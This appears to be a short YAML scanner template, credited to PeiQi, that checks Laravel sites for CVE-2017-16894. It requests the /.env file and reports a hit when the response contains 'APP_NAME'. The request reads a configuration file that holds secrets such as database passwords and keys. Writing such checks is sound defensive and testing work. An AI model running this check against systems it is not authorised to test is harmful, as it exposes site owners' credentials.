name: Laravel .env configuration file leaks (CVE-2017-16894)
manual: true
query: app="Laravel-Framework"
transport: http
rules:
  r0:
    request:
      method: GET
      path: /.env
      follow_redirects: true
    expression: response.status == 200 && response.body.bcontains(b"APP_NAME")
expression: r0()
detail:
  author: PeiQi
  links:
  - http://wiki.peiqi.tech
  description: Laravel framework is a PHP based web application development framework
    developed by Taylor otwell software developer. An information disclosure vulnerability
    exists in laravel framework 5.5.21 and earlier. Env files can be downloaded. Remote
    attackers can use this vulnerability to obtain sensitive information
  tags: Information leakage
